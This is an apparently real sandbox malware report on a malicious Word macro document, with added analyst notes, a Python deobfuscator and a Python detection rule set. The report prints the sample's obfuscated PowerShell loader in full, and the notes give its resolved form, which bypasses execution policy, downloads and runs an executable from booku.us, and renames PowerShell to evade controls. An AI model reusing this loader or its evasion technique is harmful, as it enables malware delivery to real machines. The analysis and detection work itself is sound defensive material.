| Field | Value |
|---|---|
| File name | f42d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc |
| Full analysis | https://app.any.run/tasks/7ab677f2-bccf-4d4b-9bb1-d37e8720ea64 |
| Verdict | Malicious activity |
| Analysis date | November 14, 2018, 11:51:37 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Monique Paccot-Brandt, Number of Characters: 265932, Create Time/Date: Wed Nov 7 11:34:08 2018, Last Saved Time/Date: Wed Nov 7 11:34:08 2018, Security: 0, Keywords: sunt, fuga, dolor, Last Saved By: Monique Paccot-Brandt, Revision Number: 849387, Subject: Rabais N909475675, Template: Normal, Title: Rabais N909475675, Total Editing Time: 03:00, Number of Words: 29548, Number of Pages: 85, Comments: Quas deserunt doloribus ea fugiat soluta numquam. |
| MD5 | 4F9AEBCC68A32E59B69BC2EF53D6004E |
| SHA1 | 0D31CC82284E28A13D3B0742D1DB7725987872B9 |
| SHA256 | F42D6E4509B7A47D5C944E40AA8FF916765699F100D00EC4FB97BA151C42E9BC |
| SSDEEP | 6144:AEJjQddifG/eDeSfnugIzppCBG/Ao9eYXpTwkHm:Auudifk5Sfipx0eDHm |
| File type | .doc: Microsoft Word document (33.9) |
| Document property | Value |
|---|---|
| Category | laborum |
| Manager | Noah Grosjean |
| Company | Vienne Bonvini SA |
| Slides | -2147483648 (not set) |
| Notes | -2147483648 (not set) |
| Lines | 813 |
| HiddenSlides | -2147483648 (not set) |
| Bytes | -2147483648 (not set) |
| Paragraphs | 91 |
| Comments | Quas deserunt doloribus ea fugiat soluta numquam. |
| Pages | 85 |
| Words | 29548 |
| TotalEditTime | 3.0 minutes |
| Title | Rabais N909475675 |
| Template | Normal |
| Subject | Rabais N909475675 |
| RevisionNumber | 849387 |
| LastModifiedBy | Monique Paccot-Brandt |
| Keywords | sunt, fuga, dolor |
| Security | None |
| ModifyDate | 2018:11:07 11:34:08 |
| CreateDate | 2018:11:07 11:34:08 |
| Characters | 265932 |
| Author | Monique Paccot-Brandt |
| Software | Microsoft Office Word |
| CompObjUserType | Microsoft Office Word 97-2003 Document |
| CompObjUserTypeLen | 39 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f42d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 2256 | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe $chxgjuiy='iyjflpdx.';$xjmxaf=' Pro';$lyepvac='nPol';$miiecld='exe'')';$iljgju='$hj = ''hw';$nxcswau='se -force';$udsy='e-';$ivxyoe='yste';$vyxfo='-Object S';$fagpnwa='m.Net.W';$ccxou='h); Start';$yzmva='dFile(''';$uclekne='icy By';$uuvn='https:/';$rxsjoe0='ooku.us/w';$enro5='env:';$evcyxzcc='ope';$bcun='Item ($';$ezpbjfu='temp + ''\';$iey=') -recur';$wpebnbxy1='ss -Sc';$omxfuoa='cess; $p';$xemxu='hfhj'';';$bdfdea='ath;Remov';$uuyuw='ss $p';$iwknjz1='uyvqsd';$eggjnq='ath=($env';$uueou15='lc.';$uiu='p-content';$nhfjwlcxs0='.Downl';$oljkdaht='ebclient)';$xpeiija='Executio';$immcpyin='/images';$eeblv=';(New';$ehqzt05='ecg''';$elplpda='/theme';$kpei='oa';$hdueo='belleza';$dlmcu=';';$fdve='-Proce';$wruqogv9='s/';$wjeegr='/b';$glpe=':temp+''\s';$jdiyh='exe'',$pat';$ibqeu='Set-';$aiygyo='/f';$ouuain='pa'; Invoke-Expression ($iljgju+$xemxu+$ibqeu+$xpeiija+$lyepvac+$uclekne+$ouuain+$wpebnbxy1+$evcyxzcc+$xjmxaf+$omxfuoa+$eggjnq+$glpe+$chxgjuiy+$miiecld+$eeblv+$vyxfo+$ivxyoe+$fagpnwa+$oljkdaht+$nhfjwlcxs0+$kpei+$yzmva+$uuvn+$wjeegr+$rxsjoe0+$uiu+$elplpda+$wruqogv9+$hdueo+$immcpyin+$aiygyo+$uueou15+$jdiyh+$ccxou+$fdve+$uuyuw+$bdfdea+$udsy+$bcun+$enro5+$ezpbjfu+$iwknjz1+$ehqzt05+$iey+$nxcswau+$dlmcu); | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe | | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
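The command line of PID 2256 never shows a readable payload: it assigns 47 short string fragments to throwaway variables and hands their concatenation to Invoke-Expression, so keyword-based command-line inspection sees only noise. Because the fragments are all literals, the concatenation can be resolved statically without running anything. The helper below is an added example written for this page (it is not ANY.RUN's code and not part of the sample); its input is the report's own command-line text. One fragment, `$bcun`, is damaged in the extracted report and is restored here as `'Item ($'`, an assumption, but the only value under which the neighbouring fragments form a valid `Remove-Item ($env:temp + '\uyvqsdecg')` call. Resolved, the command is `$hj = 'hwhfhj';Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\siyjflpdx.exe');(New-Object System.Net.Webclient).DownloadFile('https://booku.us/wp-content/themes/belleza/images/flc.exe',$path); Start-Process $path;Remove-Item ($env:temp + '\uyvqsdecg') -recurse -force;`, which accounts for the single TLS connection to booku.us (31.186.83.114:443) in the network table. The report lists no siyjflpdx.exe process or file, so either the download did not complete in the sandbox or the dropped-file list shown here is truncated.

```python
"""Static resolution of the fragment-concatenation obfuscation in the PID 2256 command line."""
import re

# Constructed input: the PowerShell argument of PID 2256 as printed in the report. The $bcun
# fragment is damaged in the extracted report and is restored to 'Item ($' here (assumption:
# the only value under which the surrounding fragments form a valid Remove-Item call).
OBFUSCATED = (
    r"""$chxgjuiy='iyjflpdx.';$xjmxaf=' Pro';$lyepvac='nPol';$miiecld='exe'')';$iljgju='$hj = ''hw';"""
    r"""$nxcswau='se -force';$udsy='e-';$ivxyoe='yste';$vyxfo='-Object S';$fagpnwa='m.Net.W';"""
    r"""$ccxou='h); Start';$yzmva='dFile(''';$uclekne='icy By';$uuvn='https:/';$rxsjoe0='ooku.us/w';"""
    r"""$enro5='env:';$evcyxzcc='ope';$bcun='Item ($';$ezpbjfu='temp + ''\';$iey=') -recur';"""
    r"""$wpebnbxy1='ss -Sc';$omxfuoa='cess; $p';$xemxu='hfhj'';';$bdfdea='ath;Remov';$uuyuw='ss $p';"""
    r"""$iwknjz1='uyvqsd';$eggjnq='ath=($env';$uueou15='lc.';$uiu='p-content';$nhfjwlcxs0='.Downl';"""
    r"""$oljkdaht='ebclient)';$xpeiija='Executio';$immcpyin='/images';$eeblv=';(New';$ehqzt05='ecg''';"""
    r"""$elplpda='/theme';$kpei='oa';$hdueo='belleza';$dlmcu=';';$fdve='-Proce';$wruqogv9='s/';"""
    r"""$wjeegr='/b';$glpe=':temp+''\s';$jdiyh='exe'',$pat';$ibqeu='Set-';$aiygyo='/f';$ouuain='pa'; """
    r"""Invoke-Expression ($iljgju+$xemxu+$ibqeu+$xpeiija+$lyepvac+$uclekne+$ouuain+$wpebnbxy1"""
    r"""+$evcyxzcc+$xjmxaf+$omxfuoa+$eggjnq+$glpe+$chxgjuiy+$miiecld+$eeblv+$vyxfo+$ivxyoe+$fagpnwa"""
    r"""+$oljkdaht+$nhfjwlcxs0+$kpei+$yzmva+$uuvn+$wjeegr+$rxsjoe0+$uiu+$elplpda+$wruqogv9+$hdueo"""
    r"""+$immcpyin+$aiygyo+$uueou15+$jdiyh+$ccxou+$fdve+$uuyuw+$bdfdea+$udsy+$bcun+$enro5+$ezpbjfu"""
    r"""+$iwknjz1+$ehqzt05+$iey+$nxcswau+$dlmcu);"""
)

# $name='...';  where '' inside a PowerShell single-quoted literal stands for one quote.
ASSIGN_RE = re.compile(r"\$(\w+)='((?:[^']|'')*)'\s*;")
# Invoke-Expression ($a+$b+...)  with no parentheses inside the variable list.
IEX_RE = re.compile(r"Invoke-Expression\s*\(([^)]*)\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"),]+", re.I)
# $env:temp + '\name'  as used for both the download target and the clean-up directory.
TEMP_RE = re.compile(r"\$env:temp\s*\+\s*'\\([^']+)'", re.I)


def deobfuscate(script: str) -> str:
    """Rebuild the string Invoke-Expression would have run, without executing anything."""
    fragments = {name: raw.replace("''", "'") for name, raw in ASSIGN_RE.findall(script)}
    match = IEX_RE.search(script)
    if match is None:
        raise ValueError("no Invoke-Expression over a concatenation found")
    order = [token.strip().lstrip("$") for token in match.group(1).split("+")]
    unknown = sorted(set(order) - set(fragments))
    if unknown:
        raise ValueError(f"fragments referenced but never assigned: {unknown}")
    return "".join(fragments[name] for name in order)


def extract_urls(command: str) -> list:
    """Network IOCs present in the resolved command."""
    return URL_RE.findall(command)


def extract_temp_paths(command: str) -> list:
    """Names the loader creates or deletes under %TEMP% (host IOCs)."""
    return TEMP_RE.findall(command)


if __name__ == "__main__":
    clear = deobfuscate(OBFUSCATED)
    print(clear)
    print("URLs:", extract_urls(clear))
    print("%TEMP% paths:", extract_temp_paths(clear))
```

Resolving the concatenation statically, rather than replacing `Invoke-Expression` with `Write-Output` and running the script, keeps the analysis host from touching booku.us and works identically on command lines harvested from EDR telemetry, where no sandbox is available.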
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA5A2.tmp.cvr | — | — | — |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Diagnostics.Format.ps1xml | text | FF6EEB8125B9265C5BA40AF9F7C6F6BC | 7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\DotNetTypes.format.ps1xml | xml | 1AB2FD4B6749AD6831C86411FDCAFB48 | 98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | A84B6952AB6A297CCE6C085FA8AB06CB | 54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Certificate.format.ps1xml | xml | C93A361112351B30E2C959E72789952D | 4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$2d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc.doc | pgc | 2264F9171C9E444FCE0B7BDC23BAC127 | F46705D7041937616AFFE6FC0AE1B8C782F1CDAE6A323F6CDB830DC5882BB789 |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 256A3EF47ED32A3D3038855D49DF0319 | 151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_aliases.help.txt | text | DCCDE3D3FA7A378DAB091D3B78E393CB | 5DD570CAA907247BAC82B722B453619ADC88063C238B294154939481C134B140 |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_command_precedence.help.txt | text | 9B204318B2747400638FE5028E376100 | A79D0811C03FEB6129802426F53799CBA1A93C4BD204CE33E55BC180D3F0F132 |
| 920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_CommonParameters.help.txt | text | BD04B34656EDF637080E5B39AC179450 | 5AA4D407219915FB2F87FAC21E309E9933CC98B6394A3B3D4873F5C139C48DA1 |
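The dropped-file list is what explains the odd process in the table before it. WINWORD.EXE, not an installer, wrote the `*.format.ps1xml` files and the `en-US\about_*.help.txt` files that ship next to powershell.exe into `Temp\uyvqsdecg`, the same directory that holds `uhpgyr.exe`, whose version resource reads "Windows PowerShell" 6.1.7600.16385. That is consistent with the macro copying the PowerShell binary under a random name so that controls keyed on the image name `powershell.exe` (application allow-lists, simple Sysmon or EDR rules) do not fire. The detection logic below is an added example written for this page, not a rule from ANY.RUN or any vendor; it encodes the three observable properties of PID 2256 over process-creation records. The records are constructed from the report's two process rows (the loader's command line shortened to a six-fragment stand-in of the same shape), plus one benign PowerShell launch as a control; the `MIN_FRAGMENTS` threshold is a value chosen for the example.

```python
"""Detection logic for the PID 2256 pattern: an Office process launching a relocated copy
of PowerShell from a user-writable path that feeds concatenated fragments to Invoke-Expression."""
from __future__ import annotations

import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe"}
USER_WRITABLE_RE = re.compile(r"\\appdata\\(?:local\\temp|roaming)\\", re.I)
IEX_RE = re.compile(r"invoke-expression|\biex\b", re.I)
CONCAT_RE = re.compile(r"\+\s*\$\w+")   # one match per "+$var" in a concatenation
MIN_FRAGMENTS = 5                        # example threshold; tune on your own telemetry


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str
    description: str  # version-resource FileDescription, as the sandbox reports it


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(event: ProcessEvent) -> list:
    """Names of every rule the event matches; an empty list means nothing fired."""
    hits = []
    # 1. Office parent spawning a child image that lives under the user's profile.
    if basename(event.parent_image) in OFFICE_PARENTS and USER_WRITABLE_RE.search(event.image):
        hits.append("office_child_in_user_writable_path")
    # 2. The binary says it is PowerShell but is not running under PowerShell's file name.
    if event.description.lower() == "windows powershell" and basename(event.image) not in POWERSHELL_IMAGES:
        hits.append("renamed_powershell_image")
    # 3. Invoke-Expression / iex applied to a long run of "+$var" fragments.
    if IEX_RE.search(event.command_line) and len(CONCAT_RE.findall(event.command_line)) >= MIN_FRAGMENTS:
        hits.append("iex_over_concatenated_fragments")
    return hits


def triage(events: list) -> dict:
    """Map pid -> findings for every event that matched at least one rule."""
    result = {}
    for event in events:
        hits = findings(event)
        if hits:
            result[event.pid] = hits
    return result


# Constructed sample telemetry (see the lead-in): the report's two processes plus a control.
EVENTS = [
    ProcessEvent(920, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f42d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc.doc"',
                 r"C:\Windows\explorer.exe", "Microsoft Word"),
    ProcessEvent(2256, r"C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe",
                 r"C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe $a='Start-';$b='Proc';$c='ess $p';$d='at';$e='h';$f=';'; Invoke-Expression ($a+$b+$c+$d+$e+$f);",
                 r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", "Windows PowerShell"),
    ProcessEvent(4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
                 r"C:\Windows\explorer.exe", "Windows PowerShell"),
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits)
```

Rule 2 is the one that survives the renaming trick, because it keys on the PE version resource rather than the path; rules 1 and 3 are cheap corroboration. In production the same three checks map onto Sysmon Event ID 1 fields (ParentImage, Image, Description, CommandLine), and the description check should also be applied to file-write events so the copy is caught before it runs.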
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2256 | uhpgyr.exe | 31.186.83.114:443 | booku.us | ATM S.A. | PL | unknown |

| Domain | IP | Reputation |
|---|---|---|
| booku.us | | unknown |